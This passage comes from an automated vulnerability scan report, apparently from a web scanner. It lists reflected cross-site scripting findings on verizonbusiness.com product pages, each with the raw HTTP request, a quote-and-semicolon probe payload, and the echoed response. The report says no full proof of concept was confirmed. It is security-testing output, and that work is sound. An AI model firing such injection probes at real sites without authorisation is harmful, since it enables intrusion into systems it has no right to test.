Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:45:02 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43482
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:45:02 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:45:02 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/communications/ip-telephonye393e';5bc61607e6b/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.55. http://www.verizonbusiness.com/Products/communications/managed-ucc/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/managed-ucc/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d6f33'%3bb873c7f4470 was submitted in the REST URL parameter 1. This input was echoed as d6f33';b873c7f4470 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productsd6f33'%3bb873c7f4470/communications/managed-ucc/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:43:01 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40670
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:43:01 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:43:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Productsd6f33';b873c7f4470/communications/managed-ucc/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.56. http://www.verizonbusiness.com/Products/communications/managed-ucc/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/managed-ucc/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f455"%3ba74a0a7c1f3 was submitted in the REST URL parameter 1. This input was echoed as 8f455";a74a0a7c1f3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products8f455"%3ba74a0a7c1f3/communications/managed-ucc/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:42:36 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40670
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:42:36 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:42:36 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products8f455";a74a0a7c1f3/communications/managed-ucc/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINI
...[SNIP]...

1.57. http://www.verizonbusiness.com/Products/communications/managed-ucc/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/managed-ucc/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5b785"%3b0e01037d68b was submitted in the REST URL parameter 2. This input was echoed as 5b785";0e01037d68b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/communications5b785"%3b0e01037d68b/managed-ucc/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:43:31 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42335
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:43:31 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:43:31 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/communications5b785";0e01037d68b/managed-ucc/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR
...[SNIP]...

1.58. http://www.verizonbusiness.com/Products/communications/managed-ucc/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/managed-ucc/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c9944'%3beec5dd5d94f was submitted in the REST URL parameter 2. This input was echoed as c9944';eec5dd5d94f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/communicationsc9944'%3beec5dd5d94f/managed-ucc/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:43:52 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42335
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:43:52 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:43:52 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/communicationsc9944';eec5dd5d94f/managed-ucc/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.59. http://www.verizonbusiness.com/Products/communications/managed-ucc/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/managed-ucc/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1e1e8'%3b5301a9fab19 was submitted in the REST URL parameter 3. This input was echoed as 1e1e8';5301a9fab19 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/communications/managed-ucc1e1e8'%3b5301a9fab19/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:49 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43482
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:44:49 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:49 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/Products/communications/managed-ucc1e1e8';5301a9fab19/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.60. http://www.verizonbusiness.com/Products/communications/managed-ucc/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/managed-ucc/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3538"%3b1fefbc24146 was submitted in the REST URL parameter 3. This input was echoed as a3538";1fefbc24146 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/communications/managed-ucca3538"%3b1fefbc24146/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:23 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43482
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:44:23 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:23 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
x.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/communications/managed-ucca3538";1fefbc24146/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.61. http://www.verizonbusiness.com/Products/communications/prof-svcs/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/prof-svcs/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80f92'%3bc860afee35d was submitted in the REST URL parameter 1. This input was echoed as 80f92';c860afee35d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products80f92'%3bc860afee35d/communications/prof-svcs/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:43:17 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40666
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:43:17 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:43:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products80f92';c860afee35d/communications/prof-svcs/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.62. http://www.verizonbusiness.com/Products/communications/prof-svcs/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/prof-svcs/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3a44e"%3bc33ca53e907 was submitted in the REST URL parameter 1. This input was echoed as 3a44e";c33ca53e907 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products3a44e"%3bc33ca53e907/communications/prof-svcs/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:42:32 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40666
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:42:32 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:42:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products3a44e";c33ca53e907/communications/prof-svcs/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMU
...[SNIP]...

1.63. http://www.verizonbusiness.com/Products/communications/prof-svcs/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/prof-svcs/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2a226'%3bc45d855bf03 was submitted in the REST URL parameter 2. This input was echoed as 2a226';c45d855bf03 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/communications2a226'%3bc45d855bf03/prof-svcs/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:00 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42331
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:44:00 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:00 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/communications2a226';c45d855bf03/prof-svcs/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.64. http://www.verizonbusiness.com/Products/communications/prof-svcs/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/prof-svcs/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f774"%3ba662e543ebf was submitted in the REST URL parameter 2. This input was echoed as 5f774";a662e543ebf in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/communications5f774"%3ba662e543ebf/prof-svcs/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:43:39 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42331
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:43:39 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:43:39 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/communications5f774";a662e543ebf/prof-svcs/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR S
...[SNIP]...

1.65. http://www.verizonbusiness.com/Products/communications/prof-svcs/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/prof-svcs/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 519a6"%3bad5a04e7aa5 was submitted in the REST URL parameter 3. This input was echoed as 519a6";ad5a04e7aa5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/communications/prof-svcs519a6"%3bad5a04e7aa5/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:12 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43476
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:44:12 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:12 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/communications/prof-svcs519a6";ad5a04e7aa5/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.66. http://www.verizonbusiness.com/Products/communications/prof-svcs/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/prof-svcs/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d382b'%3bd8c99d93b9b was submitted in the REST URL parameter 3. This input was echoed as d382b';d8c99d93b9b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/communications/prof-svcsd382b'%3bd8c99d93b9b/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:44 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43476
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:44:44 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:44 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/communications/prof-svcsd382b';d8c99d93b9b/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.67. http://www.verizonbusiness.com/Products/communications/traditional-telephony/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/traditional-telephony/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d0e5"%3b2d5f6bef341 was submitted in the REST URL parameter 1. This input was echoed as 5d0e5";2d5f6bef341 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products5d0e5"%3b2d5f6bef341/communications/traditional-telephony/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
